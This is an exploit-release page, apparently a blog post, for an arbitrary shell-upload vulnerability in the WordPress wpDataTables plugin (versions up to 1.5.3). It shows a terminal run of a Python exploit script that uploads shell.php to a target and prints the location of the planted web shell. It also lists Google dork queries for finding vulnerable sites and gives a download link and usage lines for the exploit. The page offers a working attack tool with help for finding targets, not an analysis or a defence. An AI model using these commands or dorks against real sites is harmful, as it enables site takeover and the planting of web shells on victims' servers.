wordpress datatables

claudio@backbox3:~/claudio$ python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php

   ___ ___               __                                                         
  |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                           
  |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                           
  |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                           
  |:      |                |__|                                                     
  |::.|:. |                                                                         
  `--- ---'                                                                         
         ___ ___       ______         __         _______       __    __                
        |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.   
        |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|   
        |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|   
        |:      |__|  |:  1    /                  |:  |                                
        |::.|:. |     |::.. . /                   |::.|                                
        `--- ---'     `------'                    `---'                                
                                                 
                                                        Sh311 Upl04d Vuln3r4b1l1ty 
                                                                <= 1.5.3

                                   Written by:

                                 Claudio Viviani

                               http://www.homelab.it

                                 [email protected]
                             [email protected]

                        https://www.facebook.com/homelabit
                          https://twitter.com/homelabit
                          https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[!] Shell Uploaded
[!] Location: http://10.0.0.67/wordpress/wp-content/uploads/2014/11/shell.php
claudio@backbox3:~/claudio$

Google Dork WordPress WpDataTables

inurl:/plugins/wpdatatables

inurl:codecanyon-3958969

index of “wpdatatables”

index of “codecanyon-3958969”

Download

Download Exploit: HERE

Exploit Usage

claudio@backbox3:~$ python wpdatatables_shell_up.py -t http[s]://localhost[:PORT] -f filname
                    python wpdatatables_shell_up.py -t http[s]://localhost[:PORT]/basedir -f filename